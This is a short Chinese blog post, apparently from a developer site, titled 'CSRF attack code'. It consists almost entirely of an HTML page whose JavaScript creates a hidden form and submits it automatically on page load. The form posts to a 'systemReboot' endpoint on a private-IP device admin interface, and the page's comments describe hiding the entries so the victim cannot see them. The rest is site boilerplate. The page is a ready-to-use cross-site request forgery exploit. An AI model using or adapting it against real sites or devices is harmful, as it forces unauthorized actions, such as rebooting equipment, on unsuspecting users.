CSRF攻击代码

<html><body><h1>  
This page forges an HTTP POST request.  
</h1>  
<script type="text/javascript">  
function post(url,fields)  
{  
//create a <form> element.  
var p = document.createElement("form");  
//construct the form  
p.action = url;  
p.innerHTML = fields;  
p.target = "_self";  
p.method = "post";  
//append the form to the current page.  
document.body.appendChild(p);  
//submit the form  
p.submit();  
}  
function csrf_hack()  
{  
var fields;  
// The following are form entries that need to be filled out  
// by attackers. The entries are made hidden, so the victim  
// won't be able to see them.  
//fields += "<input type='hidden' name='name' value='Alice'>";  
//fields += "<input type='hidden' name='description' value='aaaaaaaaaa'>";  
//fields += "<input type='hidden' name='accesslevel[description]'value='2'>";  
//fields += "<input type='hidden' name='briefdescription' value=''>";  
//fields += "<input type='hidden' name='accesslevel[briefdescription]' value='2'>";  
//fields += "<input type='hidden' name='location' value=''>";  
//fields += "<input type='hidden' name='accesslevel[location]' value='2'>";  
//fields += "<input type='hidden' name='guid' value='39'>";  
var url = "https://172.18.20.180/home/default/systemReboot/?authid=2";  
post(url,fields);  
}  
// invoke csrf_hack() after the page is loaded.  
window.onload = function() { csrf_hack();}  
</script>  
</body></html> 
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值